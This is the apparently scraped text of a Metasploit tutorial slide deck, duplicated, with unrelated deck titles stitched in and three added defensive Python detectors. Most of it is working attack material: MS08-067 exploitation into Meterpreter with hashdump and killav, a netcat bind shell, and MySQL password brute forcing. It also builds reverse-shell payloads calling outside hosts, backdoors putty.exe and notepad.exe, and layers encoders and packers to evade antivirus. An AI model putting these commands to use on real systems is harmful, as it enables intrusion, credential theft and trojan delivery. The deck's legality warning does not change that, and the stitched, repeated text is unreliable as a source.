The Metasploit Framework
●   Vast collection of exploits, payloads and encoders.
●   Modules for vulnerability scanning and information gathering.
●   Modules for exploitation and session management.
●   Modules for post exploitation, pivoting and getting all up in ur base.
Basics
Exploits and Payloads
By exploiting part of a system you interact with it in a manner not anticipated by the developers, with
the end goal of getting your own code (payload) or logic to execute.


Pentesting == Legal Le Hacking
 ●   PTES
 ●   Watered down process
      ○ Information Gathering
           ■ port scans, service enumeration, mapping the attack vector.
           ■ Testing payloads against AV, making sure everything is ready.
      ○ Exploitation
           ■ Attacking hosts.
           ■ Compromise from any angle.
      ○ Post Exploitation
           ■ Pivot -> back to information gathering -> Exploitation
                ● This time should be faster
                ● Password re-use
                ● Passwords to crack
                ● pass the hash/token
                ● You might already have DA, so just go and find what you're after.
Different kinds of Pentest

●   Web Applications
    ○   See OWASP
    ○   SQLi, XSS, Csrf, directory traversal, broken authentication, session
        management, access controls, reflected attacks, breaking application
        logic, client side attacks, information disclosure
●   Footprint
    ○   What hosts/services are visible to public networks, information
        disclosure, forgotten hosts, incorrectly configured hardware.
●   Infrastructure
    ○   Attacking hosts on a network, often internal to an organization or hosts
        found during the footprint.
    ○   Targeting hosts - OS and services (outdated/unpatched), weak
        passwords, incorrectly configured applications, zero days.
    ○   Targeting infrastructure - Routers and switches, IDS/IPS capabilities
nmap primer
●   nmap is a port scanner and OS/service fingerprinting tool.
●   It has become even more than that: welcome the NSE (Nmap Scripting Engine).
     ○ Vuln checking and much more.

Basic Scanning:
nmap -sS 10.0.0.1-100 -p80
nmap -sS -O -A 10.0.0.55
nmap -oX - 10.0.0.1/24

In msfconsole (once you have a database connected)
msf > db_connect <username>:<password>@127.0.0.1/my_msf_db
Check that you are connected by using:
msf > db_status

db_nmap <options>
Interacting with Metasploit
msfconsole
Most used, feature-rich, well supported. This is where the magic happens; make sure you run it as
root.
root@bt5:/# msfconsole
msf >


msfcli
Focused on scripting and interaction with other command line tools. Sexy one-liners.


armitage
The Metasploit GUI, nice for fuzzing, but let's stick to msfconsole.


Some of the other components you might use:
msfpayload, msfencode, msfvenom


Other bits of awesome:
karmasploit, SET, Wmap
Metasploit DB
First create a user and database
root@bt5:/# su postgres
postgres@bt5:/# createuser foobar -P
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
postgres@bt5:/# createdb --owner=foobar foo_db

Then in msfconsole connect to the database
msf > db_connect foobar:<password>@127.0.0.1/foo_db

From now on you can work with the database in msfconsole; db_nmap will save nmap results to the
database automatically.
Basic Commands
● use <module>
  ○ info
  ○ show options
  ○ set <option> <value>
● show
  ○ payloads
  ○ exploits
  ○ auxiliary
  ○ options
● search
  ○ string that will make your day, e.g. "search vnc"
● back
Brute Force Attacks
Let's do a brute force dictionary attack on MySQL server(s).
First step is to find hosts running MySQL:
nmap -sV -p3306 --open <IP Range>

If that returns some hosts you can target a specific one, or if you're lazy,
skip the nmap scan and do it directly with the Metasploit mysql login scanner:
msf > use auxiliary/scanner/mysql/mysql_login
msf > set USERPASS_FILE /home/me/short.txt
msf > set RHOSTS <IP || Range>
msf > exploit
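Added example, not from the deck: the same dictionary attack seen from the server side. A sliding-window detector over constructed MySQL error-log lines that alerts when one source racks up too many "Access denied" failures; the log line format, the window and the threshold are assumptions.

```python
"""Flag dictionary attacks against MySQL from its error log.

Added example: the log lines are constructed to resemble MySQL 5.x 'Access denied'
warnings and were not captured from a real server.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log excerpt: one scanner hammering root/admin from 10.0.0.15 and
# one genuine typo from 10.0.0.42, followed by an unrelated [Note] line.
SAMPLE_LOG = """\
120321 19:55:01 [Warning] Access denied for user 'root'@'10.0.0.15' (using password: YES)
120321 19:55:01 [Warning] Access denied for user 'root'@'10.0.0.15' (using password: YES)
120321 19:55:02 [Warning] Access denied for user 'root'@'10.0.0.15' (using password: NO)
120321 19:55:02 [Warning] Access denied for user 'admin'@'10.0.0.15' (using password: YES)
120321 19:55:03 [Warning] Access denied for user 'admin'@'10.0.0.15' (using password: YES)
120321 19:55:10 [Warning] Access denied for user 'app'@'10.0.0.42' (using password: YES)
120321 19:55:30 [Warning] Access denied for user 'root'@'10.0.0.15' (using password: YES)
120321 19:57:00 [Note] /usr/sbin/mysqld: ready for connections.
"""

# Assumed line layout: "YYMMDD HH:MM:SS [Warning] Access denied for user 'u'@'host' ..."
LINE_RE = re.compile(
    r"^(?P<ts>\d{6} \d{1,2}:\d{2}:\d{2}) \[Warning\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<src>[^']+)'"
)


def parse_failures(log_text):
    """Yield (timestamp, user, source) for every access-denied line, skipping the rest."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%y%m%d %H:%M:%S")
        yield ts, m.group("user"), m.group("src")


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {source: (first_failure_in_window, sorted usernames tried)} for every
    source that reaches `threshold` failed logins inside a sliding `window`."""
    recent = defaultdict(deque)   # source -> timestamps of failures still inside the window
    users = defaultdict(set)      # source -> usernames it has tried (scanners spray several)
    alerts = {}
    for ts, user, src in parse_failures(log_text):
        q = recent[src]
        q.append(ts)
        users[src].add(user)
        while q and ts - q[0] > window:
            q.popleft()           # expire failures older than the window
        if len(q) >= threshold and src not in alerts:
            alerts[src] = (q[0], sorted(users[src]))   # alert once per source
    return alerts


if __name__ == "__main__":
    for src, (first, names) in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {src}: password guessing since {first}, users tried {names}")
```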
Shellz
A shell is software that sits between a user and the kernel; it provides an interface for interacting with the kernel.


Bind Shell
A bind shell "binds" an interactive shell to a port on the victim's host, thus allowing the attacker (or
anyone for that matter) to connect to it. A simple example using netcat: nc.exe -lvp 4444 -e cmd.exe


Reverse Shell
Creates a shell from the target host back to the attacker's host. Consider a target sitting behind NAT:
this would stop you in your tracks if you tried to create a bind shell (unless you had already
compromised their router and set up port forwarding). So if your target does not have a publicly
accessible IP (but you do), use a reverse shell. NAT lolwut


Meterpreter Shell
The meta-interpreter is a payload that provides complex and advanced functionality; all functions
loaded and executed by meterpreter are done so in memory. Think of it as a meta shell with a ton of
built-in features that will save you a lot of time and effort. Some useful meterpreter commands are
covered later; use the following for navigating sessions.
meterpreter > background
msf > sessions
msf > sessions -i <session #>
The Art of Exploitation
Information Gathering
msf > db_nmap -sS -O -A 192.168.24.134




Now let's check for MS08-067 since it's running XP < SP3
msf > db_nmap --script smb-check-vulns.nse -p445 192.168.24.134
msf > vulns
The Art of Exploitation
Confirming vulnerability, ready exploit

msf > vulns showed us that the host was indeed vulnerable:
[*] Time: 2012-03-21 19:56:10 UTC Vuln: host=192.168.24.134 port=445 proto=tcp name=MS08-067 refs=CVE-2008-4250,BID-31874,OSVDB-49243,CWE-94,MSFT-MS08-067,MSF-Microsoft Server Service Relative Path Stack Corruption,NSS-34476


Time to use our first exploit, first search for it:
msf > search ms08-067
 Name                                 Disclosure Date  Rank   Description
 ----                                 ---------------  ----   -----------
 exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption


Time to load the exploit:
msf > use exploit/windows/smb/ms08_067_netapi


Use show options || payloads to see the configuration options available.
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > show payloads
The Art of Exploitation
Configure the exploit
msf exploit(ms08_067_netapi) > set RHOST 192.168.24.134
RHOST => 192.168.24.134

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(ms08_067_netapi) > show options

Everything looks good, now run the exploit
The Art of Post Exploitation
Meterpreter commands of interest:
meterpreter > hashdump
meterpreter > shell

Current user, working directory and process ID
meterpreter > getuid
meterpreter > pwd
meterpreter > getpid

Now you can migrate to a more reliable process, although it's not really necessary in this case
meterpreter > ps
meterpreter > migrate <pid>

Some fun
meterpreter > screenshot
meterpreter > run vnc
meterpreter > run killav
MSFpayload
Used to create payloads on their own; sharing is caring.
msfpayload linux/x64/shell_reverse_tcp LHOST=41.12.1.12 LPORT=4444 x > funkytown.exe




Stealthy ninja, hidden ginger. Launch the payload while continuing normal execution. -k tells the payload to
launch in a separate thread (does not work with all executables; test, test, test)
root@bt:/# msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x putty.exe -o /var/www/putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5
Multi-handler
●      You have a payload

●      The user will execute it (or you might). How do you handle the connection?

●      Welcome to the multi-handler.


root@bt:/# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=10.0.0.15 LPORT=6666 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 10.0.0.15:6666
[*] Starting the payload handler...
[*] Command shell session 1 opened (10.0.0.15:6666 -> 10.0.0.10:1129)


C:\Documents and Settings\Administrator\My Documents\Pron Downloads> :)


Make sure the payload matches the one you created with msfpayload.
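Added example covering both the bind/reverse shell section and the multi-handler session above (not the deck's own code): a classifier over a constructed socket table from the victim's side that flags a netcat listener executing a program on connect and a command interpreter that owns an established connection. Process names, the record layout and the listener baseline are assumptions.

```python
"""Spot bind-shell and reverse-shell sockets in a process/socket listing.

Added example: the records are constructed to look like a `netstat -anob`-style
listing on the victim host from the deck; they are not real captures.
"""
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "sh", "bash", "dash"}
NETCAT_IMAGES = {"nc.exe", "ncat.exe", "nc", "ncat"}
KNOWN_LISTEN_PORTS = {135, 139, 445, 3389}   # assumed baseline for this Windows host

# Constructed socket table: (image, cmdline, local_port, remote_addr, remote_port, state)
SAMPLE_SOCKETS = [
    ("svchost.exe", "svchost.exe -k rpcss", 135, None, None, "LISTENING"),
    ("System", "System", 445, None, None, "LISTENING"),
    # bind shell from the deck: nc.exe -lvp 4444 -e cmd.exe
    ("nc.exe", "nc.exe -lvp 4444 -e cmd.exe", 4444, None, None, "LISTENING"),
    # reverse shell: the session the multi-handler reported, seen from the victim side
    ("cmd.exe", "cmd.exe", 1129, "10.0.0.15", 6666, "ESTABLISHED"),
    # normal browsing, must not be flagged
    ("firefox.exe", "firefox.exe", 1130, "203.0.113.7", 443, "ESTABLISHED"),
]


def basename(image):
    """Strip any Windows or POSIX path so rules can match on the image name alone."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify_sockets(sockets, known_ports=KNOWN_LISTEN_PORTS):
    """Return a list of (rule, image, detail) findings, one per suspicious socket."""
    findings = []
    for image, cmdline, lport, raddr, rport, state in sockets:
        name = basename(image)
        if state == "LISTENING":
            # netcat given -e hands the accepted socket to a program: the classic bind shell
            if name in NETCAT_IMAGES and " -e " in f" {cmdline} ":
                findings.append(("bind-shell: netcat executing a program on connect",
                                 image, f"port {lport}: {cmdline}"))
            elif lport not in known_ports:
                findings.append(("unexpected listener", image, f"port {lport} not in baseline"))
        elif state == "ESTABLISHED" and name in SHELL_IMAGES:
            # an interpreter normally has no sockets; one talking outbound is a reverse shell
            findings.append(("reverse-shell: command interpreter owns a network socket",
                             image, f"-> {raddr}:{rport}"))
    return findings


if __name__ == "__main__":
    for rule, image, detail in classify_sockets(SAMPLE_SOCKETS):
        print(f"{rule:60} {image:12} {detail}")
```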
MSFencode
 ●   Anti-Virus Evasion
 ●   IDS Evasion
 ●   Taking care of bad characters in your shellcode
       ○ \x00 and \xff


Show list of encoders:
msfencode -l

When in doubt, use x86/shikata_ga_nai, a Polymorphic XOR Additive Feedback Encoder and the only
encoder that has been rated Excellent.

You can have multiple encoding runs:
msfpayload windows/meterpreter/reverse_tcp LHOST=iam.a.lhama.lol LPORT=12345 R |
msfencode -e x86/shikata_ga_nai -c 5 -t raw |
msfencode -e x86/alpha_upper -c 2 -t raw |
... Keep on Shuffling ... |
msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/jouma.exe
Hiding in plain sight
Custom Executable Templates

●    msfpayload embeds payload into a default executable template (data/templates/template.exe)

●    While this template does change from time to time, AV companies check it.

●    You can however use any Windows executable in place of the default.

      ○   Use the -x option


msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x custom/notepad.exe -o /var/www/ponies/inurbase.exe -e x86/shikata_ga_nai -c 5


Packers
Tool that compresses an executable and combines it with decompression code.

root@bt:/# upx -5 /var/www/payload.exe
Don't be stupid
Pwnage is awesome

●   getting shellz rock.
●   realising you have remote code execution in a service is better than coke.
●   Dumping hashes and cracking them makes you laugh.

Getting caught is kak

●   and you will get caught *cough* Sabu *cough* if you mess with systems
    without authorization.
●   Having Bubba as a cellmate WILL be uncomfortable.
●   No one likes a show off.
●   Getting kicked out of university is counter productive and ill advised.
●   So...


                        DON'T BE STUPID
Don't be stupid
Bubba loves ponies, you don't want to
be a pony...

 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 

Metasploit: Pwnage and Ponies

●   nmap is a port scanner and OS/service fingerprinting tool.
●   It has become even more: welcome the NSE.
    ○   Vuln checking and much more.

Basic Scanning:

nmap -sS 10.0.0.1-100 -p80
nmap -sS -O -A 10.0.0.55
nmap -oX - 10.0.0.1/24

In msfconsole (once you have a database connected):

msf > db_connect <username>:<password>@127.0.0.1/my_msf_db

Check that you are connected by using:

msf > db_status
db_nmap <options>
Interacting with Metasploit

msfconsole
Most used, feature rich, well supported. This is where the magic happens; make sure you run it as root.

root@bt5:/# msfconsole
msf >

msfcli
Focused towards scripting and interaction with other command line tools. Sexy one liners.

armitage
The Metasploit GUI, nice for fuzzing, but let's stick to msfconsole.

Some of the other components you might use: msfpayload, msfencode, msfvenom
Other bits of awesome: karmasploit, SET, Wmap
Metasploit DB

First create a user and database:

root@bt5:/# su postgres
postgres@bt5:/# createuser foobar -P
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
postgres@bt5:/# createdb --owner=foobar foo_db

Then in msfconsole connect to the database:

msf > db_connect foobar:<password>@127.0.0.1/foo_db

From now on you can work with the database in msfconsole; db_nmap will save nmap results to the database automatically.
Basic Commands

●   use <module>
    ○   info
    ○   show options
    ○   set <option> <value>
●   show
    ○   payloads
    ○   exploits
    ○   auxiliary
    ○   options
●   search
    ○   string that will make your day, "show vnc"
●   back
Brute Force Attacks

Let's do a brute force dictionary attack on mysql server(s).

First step is to find hosts running mysql:

nmap -sV -p3306 --open <IP Range>

If that returns some hosts, you can target a specific one, or if you're lazy, skip the nmap scan and do it directly with the metasploit mysql login scanner:

msf > use auxiliary/scanner/mysql/mysql_login
msf > set USERPASS /home/me/short.txt
msf > set RHOSTS <IP || Range>
msf > exploit
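The nmap primer shows `nmap -oX -` and the brute-force slide sweeps for port 3306 with `--open`; the same exposure question can be answered from a saved scan. This is an added example, not code from the slides or from Metasploit: a small parser for nmap's XML output that builds a per-host inventory of open services. The XML document embedded below is constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed nmap XML (the shape `nmap -oX -` emits), trimmed to the elements
# used below: two hosts, one open MySQL port, one closed and one open SMB port.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -p445,3306 -oX - 10.0.0.1-2">
  <host><status state="up"/><address addr="10.0.0.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="3306"><state state="open"/>
        <service name="mysql" product="MySQL" version="5.1.41"/></port>
      <port protocol="tcp" portid="445"><state state="closed"/></port>
    </ports></host>
  <host><status state="up"/><address addr="10.0.0.2" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds"/></port>
    </ports></host>
</nmaprun>"""


def parse_nmap_xml(xml_text):
    """Return {ip: [(port, proto, service, version), ...]} listing open ports only."""
    inventory = {}
    for host in ET.fromstring(xml_text).findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        open_ports = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not exposure
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            parts = [svc.get("product"), svc.get("version")] if svc is not None else []
            open_ports.append((int(port.get("portid")), port.get("protocol"),
                               name, " ".join(p for p in parts if p)))
        inventory[addr.get("addr")] = open_ports
    return inventory


def hosts_exposing(inventory, service):
    """IPs exposing a named service, e.g. 'mysql' for the login-scanner slide."""
    return sorted(ip for ip, ports in inventory.items()
                  if any(p[2] == service for p in ports))


if __name__ == "__main__":
    inv = parse_nmap_xml(SAMPLE_NMAP_XML)
    print("mysql exposed on:", hosts_exposing(inv, "mysql"))  # ['10.0.0.1']
```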
Shellz

A shell is software that sits between a user and the kernel; it provides an interface for interacting with the kernel.

Bind Shell
A bind shell "binds" an interactive shell to a port on the victim's host, thus allowing the attacker (or anyone for that matter) to connect to it. A simple example using netcat:

nc.exe -lvp 4444 -e cmd.exe

Reverse Shell
Creates a shell from the target host to the attacker's host. Consider your target is sitting behind a NAT; this would stop you in your tracks if you tried to create a bind shell (unless you had already compromised their router and set up port forwarding). So if your target does not have a publicly accessible IP (but you do), use a reverse shell.

NAT lolwut

Meterpreter Shell
The meta interpreter is a payload that provides complex and advanced functionality; all functions loaded and executed by meterpreter are done so in memory. Think of it as a meta shell with a ton of built-in features that will save you a lot of time and effort. Some useful meterpreter commands are covered later; use the following for navigating sessions:

meterpreter > background
msf > sessions
msf > sessions -i <session #>
The Art of Exploitation

Information Gathering

msf > db_nmap -sS -O -A 192.168.24.134

Now let's check for MS08-067 since it's running XP < SP3:

msf > db_nmap --script smb-check-vulns.nse -p445 192.168.24.134
msf > vulns
The Art of Exploitation

Confirming vulnerability, ready exploit

msf > vulns showed us that the host was indeed vulnerable:

[*] Time: 2012-03-21 19:56:10 UTC Vuln: host=192.168.24.134 port=445 proto=tcp name=MS08-067 refs=CVE-2008-4250,BID-31874,OSVDB-49243,CWE-94,MSFT-MS08-067,MSF-Microsoft Server Service Relative Path Stack Corruption,NSS-34476

Time to use our first exploit; first search for it:

msf > search ms08-067

Name                                 Disclosure Date  Rank   Description
----                                 ---------------  ----   -----------
exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption

Time to load the exploit:

msf > use exploit/windows/smb/ms08_067_netapi

Use show options || payloads to see the configuration options available.

msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > show payloads
The Art of Exploitation

Configure the exploit

msf exploit(ms08_067_netapi) > set RHOST 192.168.24.134
RHOST => 192.168.24.134
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > show options

Everything looks good, now run the exploit.
The Art of Post Exploitation

Meterpreter commands of interest:

meterpreter > hashdump
meterpreter > shell

Current user, working directory and process ID:

meterpreter > getuid
meterpreter > pwd
meterpreter > getpid

Now you can migrate to a more reliable process, although not really necessary in this case:

meterpreter > ps
meterpreter > migrate <pid>

Some fun:

meterpreter > screenshot
meterpreter > run vnc
meterpreter > run killav
MSFpayload

Used to create payloads on their own; sharing is caring.

msfpayload linux/x64/shell_reverse_tcp LHOST=41.12.1.12 LPORT=4444 x > funkytown.exe

Stealthy ninja, hidden ginger. Launch payload while continuing normal execution. -k tells the payload to launch in a separate thread (does not work with all executables: test, test, test).

root@bt:/# msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x putty.exe -o var/www/putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5
Multi-handler

●   You have a payload.
●   The user will execute it (or you might).

How do you handle the connection?

●   Welcome to the multi-handler.

root@bt:/# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=10.0.0.15 LPORT=6666 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 10.0.0.15:6666
[*] Starting the payload handler...
[*] Command shell session 1 opened (10.0.0.15:6666 -> 10.0.0.10:1129)

C:\Documents and Settings\Administrator\My Documents\Pron Downloads> :)

Make sure the payload matches the one you created with msfpayload.
MSFencode

●   Anti-Virus Evasion
●   IDS Evasion
●   Taking care of bad characters in your shellcode
    ○   \x00 and \xff

Show list of encoders:

msfencode -l

When in doubt, use x86/shikata_ga_nai, a Polymorphic XOR Additive Feedback Encoder, the only encoder that has been rated Excellent.

You can have multiple encoding runs:

msfpayload windows/meterpreter/reverse_tcp LHOST=iam.a.lhama.lol LPORT=12345 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | ... Keep on Shuffling ... | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/jouma.exe
Hiding in plain sight

Custom Executable Templates
●   msfpayload embeds the payload into a default executable template (data/templates/template.exe).
●   While this template does change from time to time, AV companies check it.
●   You can however use any Windows executable in place of the default.
    ○   Use the -x option.

msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x custom/notepad.exe -o /var/www/ponies/inurbase.exe -e x86/shikata_ga_nai -c 5

Packers
Tool that compresses an executable and combines it with decompression code.

root@bt:/# upx -5 /var/www/payload.exe
Don't be stupid

Pwnage is awesome
●   getting shellz rock.
●   realising you have remote code execution in a service is better than coke.
●   Dumping hashes and cracking them makes you laugh.

Getting caught is kak
●   and you will get caught *cough* Sabu *cough* if you mess with systems without authorization.
●   Having Bubba as a cellmate WILL be uncomfortable.
●   No one likes a show off.
●   Getting kicked out of university is counter productive and ill advised.
●   So... DON'T BE STUPID
Don't be stupid

Bubba loves ponies, you don't want to be a pony...